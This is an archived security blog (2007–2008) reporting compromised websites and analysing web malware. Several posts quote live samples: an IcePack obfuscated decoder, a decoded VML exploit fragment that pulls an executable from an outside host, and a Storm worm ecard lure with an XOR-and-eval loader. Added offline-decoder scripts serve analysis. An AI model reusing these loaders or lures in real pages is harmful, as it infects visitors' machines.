TrendMicro website hacked / FUCKJP.JS / VIP 2.74

Posted in Uncategorized on March 15, 2008 by ianstarkc

There are some reports in the media that the antivirus company Trend Micro's website was hacked and is spreading malware. In short, you can read about it here, here, and here.

According to Sophos' coverage, their website was injected on 9th March, but I have a Google cache of the infected Trend Micro Japanese page dated 6th March. That means their website was injected with the script before 9th March.

Why did the attackers name the script "FUCKJP.JS"? You all know what JP stands for :)

I also searched Google for the same script and found around 13,000 injected pages on legitimate websites, mainly in India, including NIC.IN!!

After analysing the script I recalled that scripts of this kind are generated by web attacker toolkits like MPack, FirePack, IcePack, WPack or AnnyPack: you just feed in some information such as the payload and place the output on a compromised or newly set up web server. In this case, though, it is VIP 2.74 from Chinese hackers. The latest version is 2.842.

Other information about the malware you can find yourself :). Just see the screenshots below...

[Screenshots: 3.jpg, 1.jpg, 2.jpg, 4.jpg]

Orkut spam is in the wild...

Posted in Uncategorized on February 21, 2008 by ianstarkc

Yesterday someone reported that a malicious JavaScript is circulating in the wild which results in lots of spam to Orkut users advertising Innobuzz course details. I contacted the author of the blog and he passed on the shocking reply he had received.

This is Rohit. I'm the person responsible for developing the Orkut script (anybody who wants to sue, this is the buddy) which you are talking about.

First let me tell you that I would have done the same as what you have done if I were in your shoes, but our company has not at all created this script. The script which we created is available here: Website_name. This was circulated in a closed environment within a few friends to show how Orkut can be used for spamming purposes. (It means Innobuzz is teaching how to spam through Orkut!! Under US law, teaching like that is illegal and subject to punishment.) However, it seems that someone has made a copy of the script, changed the title to something which appeals to everyone and let it free on Orkut.


That's hilarious!! Throughout my past six years of experience in information security and cyber law, this is the first and foremost important fact: "security concern through internal threats within a company". There are lots of papers on the internet about protecting a company environment from internal threats; this is one more example of that, if it is so. According to Rohit Sharma of InnoBuzz, that script was just a demo in their internal and limited environment and somebody copied and circulated it, resulting in spam and a DDoS of their website. Is it legal to present a demo on a live social networking website like Orkut, and where is the limit?
Worse still, they teach "ethical hacking" courses and they don't know how to give a demo? I am of the opinion that they did it intentionally for advertisement. Anyway, here you can find more info about that script.

UPDATE: "Finally, Google has closed the website and the script" - Rohit Sharma
Close the company as well!!!!! :-)

Antivirus company selling infected antivirus software!!!!!!!!!

Posted in Uncategorized on February 12, 2008 by ianstarkc

It's "Virut" again.

This time a Pune (India) based antivirus company is serving antivirus software which is itself infected with the "Virut" virus.

Read more info at: Here

Antivirus company website is infected!!!

Posted in Uncategorized on February 6, 2008 by ianstarkc

UPDATE (08/02): The malicious IFRAME has been removed. Web admins should know the various methods of attack and keep their site/server updated and audited.

What would you think if an antivirus company's website itself infected its users? That is the most alarming situation in web security, and the problem with surfing supposedly trusted websites.
The same happened to the Delhi (India) based AVsoft Technologies' antivirus website http://www.s-cop.com.
Their product "SmartCop Antivirus" is capable of detecting malware!

The infection is delivered by exploiting common client-side vulnerabilities with an obfuscated (encoded) script. The decoder in this case, dc(), maps each character of the blob through a lookup table to a 6-bit value, packs the bits into bytes, XORs every byte with 165 (0xA5) and hands the result to document.write, so the real exploit page never appears in the page source. Note that the lookup table as reproduced below is too short to cover the letters that appear in the blob, so the excerpt cannot be decoded as-is. It looks like this:

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decodes to

<html xmlns:v="urn:schemas-microsoft-com:vml"><head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id="myDivA"></div>
<script language="JavaScript">
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
'<param name="src" value="http://ntkrnlpa[dot]info/rc/exe[dot]
………
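The dc() decoder shown above can be run outside the browser once its only sink, document.write, is swapped for a buffer. The following is an added example, not code from the original post or from the IcePack kit: it ports dc() as-is (same 6-bit packing, same XOR with 165), adds the inverse encoder so the demo can build its own input, and returns the decoded stage as a string. Because the lookup table in the post is truncated, the 64-symbol alphabet, the sample stage-2 fragment and the function names other than dc() are assumptions made for this demo; the real kit's table differs.

```javascript
// Added example (not from the original post): a stand-alone port of the dc()
// decoder with document.write() replaced by a buffer, so the second stage is
// returned as text instead of being rendered and executed.

// ASSUMPTION: the lookup table in the post is cut off, so this 64-symbol
// alphabet is constructed for the demo; the real one used different values.
// Every symbol is >= '0' (charCode 48) because the decoder indexes t[c - 48].
const ALPHABET =
  "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}";
const XOR_KEY = 165; // the constant in `165^w&255` in the original decoder

// Build the same kind of table the malware used: t[charCode - 48] = 6-bit value.
function buildTable(alphabet) {
  const t = [];
  for (let v = 0; v < alphabet.length; v++) t[alphabet.charCodeAt(v) - 48] = v;
  return t;
}

// Port of dc(x) with the original variable names. Each symbol contributes
// 6 bits; after the first symbol of a group every further symbol completes one
// byte, which is XORed with the key. `doc.write` is the only sink.
function dc(x, t, doc) {
  let l = x.length, b = 1024, p = 0, s = 0, w = 0;
  for (let j = Math.ceil(l / b); j > 0; j--) {
    let r = "";
    for (let i = Math.min(l, b); i > 0; i--, l--) {
      const v = t[x.charCodeAt(p++) - 48];
      if (v === undefined) throw new Error("symbol not in alphabet at offset " + (p - 1));
      w |= v << s;
      if (s) {
        r += String.fromCharCode(XOR_KEY ^ (w & 255));
        w >>= 8;
        s -= 2;
      } else {
        s = 6;
      }
    }
    doc.write(r);
  }
}

// Analyst harness: run dc() against a fake document and return everything it
// tried to write, instead of letting the browser render it.
function decodeOffline(encoded, alphabet) {
  const captured = [];
  dc(encoded, buildTable(alphabet), { write: (chunk) => captured.push(chunk) });
  return captured.join("");
}

// Inverse of dc(), used here only to build sample input. Three plaintext bytes
// (after the XOR) become four symbols:
//   v0 = c0 & 63            v1 = (c0 >> 6) | ((c1 & 15) << 2)
//   v2 = (c1 >> 4) | ((c2 & 3) << 4)        v3 = c2 >> 2
// A tail of 1 or 2 bytes yields 2 or 3 symbols, matching what dc() consumes.
function encode(plain, alphabet) {
  let out = "";
  for (let i = 0; i < plain.length; i += 3) {
    const c = [0, 1, 2].map((k) =>
      i + k < plain.length ? (plain.charCodeAt(i + k) ^ XOR_KEY) & 255 : 0);
    const v = [c[0] & 63, (c[0] >> 6) | ((c[1] & 15) << 2),
               (c[1] >> 4) | ((c[2] & 3) << 4), c[2] >> 2];
    const n = Math.min(4, plain.length - i + 1);
    for (let k = 0; k < n; k++) out += alphabet[v[k]];
  }
  return out;
}

// Constructed sample: a fragment resembling the decoded stage in the post.
const SAMPLE_STAGE2 = '<div id="myDivA"></div><script>function Attack(n){}</script>';
const SAMPLE_BLOB = encode(SAMPLE_STAGE2, ALPHABET);

console.log(SAMPLE_BLOB);
console.log(decodeOffline(SAMPLE_BLOB, ALPHABET));
```

The same harness applies to any kit that writes its stage through document.write: leave the decoder untouched, replace the sink, and diff the captured text against what the browser would have rendered. The 1024-character chunking in dc() is preserved so that blobs longer than one chunk (the usual case for a full exploit page) decode identically.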
Just see the screenshots below...

[Screenshots: 4.jpg, 3.jpg, 2.jpg]

All of this is generated by the infamous underground tool "IcePack". You can see the admin console below:

[Screenshot: 1.jpg]

Already reported to the concerned authorities.

Want to phish HDFC Bank? How?

Posted in Uncategorized on January 31, 2008 by ianstarkc

There has been a sharp rise in phishing of banking-related sites, especially those of small national banks. This year started with the hacking of Indian bank sites, but there is still no awareness of security or of the risks of disclosing personal details.

This time HDFC Bank is practising a weak security policy by publishing personal details (customer email addresses) on their main site; there is still a long way to go in learning security from the past.

I hope HDFC Bank will take this information down. In spite of this, they do have some good security features, like login with a virtual keyboard to fight keyloggers, but on the other side there are very smart malwares too :)

I was looking around the websites of Indian banks like ICICI Bank, SBI and HDFC Bank, and stuck with the HDFC Bank website after finding the email addresses of its customers...
[Screenshot: hdfc1.jpg]

RealPlayer Exploit in the Wild

Posted in Uncategorized on January 5, 2008 by ianstarkc

Evgeny Legerov published a vulnerability in RealPlayer which can be used to execute code on vulnerable computers.

Right now there is no patch available for this.

For more information check

http://www.frsirt.com/english/advisories/2008/0016

http://secunia.com/advisories/28276/

http://gleg.net/realplayer11.html

Now there is already a malicious script for RealPlayer and, to my surprise, lots of websites carry the code that loads it. See the screenshot below.

uc8010.com and ucmal.com
[Screenshot: 1.jpg]

Extracting Malware Link from IMAGE :)

Posted in Uncategorized on November 6, 2007 by ianstarkc

On 2nd Nov 2007 the SophosLabs UK blog uncovered a new web attack, "An iframe alternative". They published the image, but the malware link in it was not clear, so I did a little experiment: I just changed the resolution and colour depth and, well, have a look :) WARNING: DON'T VISIT THE LINK, IT IS MALWARE.
Original image:
[Original]

Now look at:
[test1]

I think much better:
[test3]

Now verification with 'Google'!!!
[test3]

Delhi University website redirects to porn sites!!!

Posted in Uncategorized on November 3, 2007 by ianstarkc

While searching on Google I found that the Delhi University website has some pages which redirect to porn links. See the images below...

[Screenshots]

UPDATE (5/11): After reporting it to the webmaster, it has now been removed... quick response :)

Ecard Worm is using “function kaspersky(suck,dick){};”

Posted in Uncategorized on August 15, 2007 by ianstarkc

This time the ecard (a.k.a. Storm worm) variant defines two functions in its encoded JavaScript that do nothing at all: kaspersky() and kaspersky2() are empty decoys, and the real work is done by xor_str(), which XORs the escaped string with the key 93 and passes the result to eval(). Just see the encoded JavaScript...

To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href="/msdataaccess.exe">click here</a>.<div id="mydiv"></div><Script Language='JavaScript'> function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = "\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57"; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>
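As an added example (not part of the original post), the loader above can be decoded statically: a short script pulls the \xNN-escaped plain_str literal and the xor_str() key out of the mail's script text and applies the XOR itself, so eval() never runs. The script text embedded below is copied from the post; the regular expressions and the function names are this example's own.

```javascript
// Added example (not part of the original post): recover the XOR key and the
// escaped payload from the ecard script text and decode it without eval().

// Sample input copied from the post. String.raw keeps the \xNN escapes as
// literal text, exactly as they sit in the mail body.
const ECARD_SCRIPT = String.raw`<Script Language='JavaScript'>
function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }
function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};
var plain_str = "\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57";
var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>`;

// Locate the escaped string literal assigned to plain_str and the numeric key
// passed to xor_str(). Both patterns are this example's own, written for the
// layout seen in the post.
function extractPayload(scriptText) {
  const blob = scriptText.match(/plain_str\s*=\s*"((?:\\x[0-9a-fA-F]{2})+)"/);
  const key = scriptText.match(/xor_str\(\s*plain_str\s*,\s*(\d+)\s*\)/);
  if (!blob || !key) throw new Error("plain_str literal or xor key not found");
  const bytes = blob[1]
    .match(/\\x([0-9a-fA-F]{2})/g)
    .map((esc) => parseInt(esc.slice(2), 16));
  return { bytes, key: parseInt(key[1], 10) };
}

// Same arithmetic as the malware's xor_str(), applied to the raw byte values.
function xorDecode(bytes, key) {
  return bytes.map((b) => String.fromCharCode(b ^ key)).join("");
}

// Full pipeline: script text in, decoded second stage out. Nothing is evaluated.
function decodeEcard(scriptText) {
  const { bytes, key } = extractPayload(scriptText);
  return xorDecode(bytes, key);
}

// The stage uses CRLF line endings and blank lines; normalise them for reading.
function decodedLines(scriptText) {
  return decodeEcard(scriptText)
    .split(/\r?\n/)
    .map((line) => line.trim())
    .filter((line) => line.length > 0);
}

console.log(decodedLines(ECARD_SCRIPT).join("\n"));
```

For this sample the result is three statements: `var mm = new Array();`, `var mem_flag = 0;` and `start();`. start() is not defined anywhere in the excerpt the post reproduces, so what is quoted is only the head of the loader; the exploit code it eventually runs lives in the part of the page that was not shown. The two kaspersky*() functions contribute nothing to the decode.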

BlackHat USA’07 & DEFCON 15

Posted in Uncategorized on August 9, 2007 by ianstarkc

Awesome conferences!! They'll take some time to upload the slides; meanwhile, if you want to download them, just check here:

BlackHat USA’07

http://www.hotsecuritynews.com/bh-usa-07/

Defcon-15

http://www.freelanceresearch.org/DEFCON_15.iso

http://bzimage.spymac.net/DEFCON_15.iso

http://garaged.homeip.net/DEFCON15/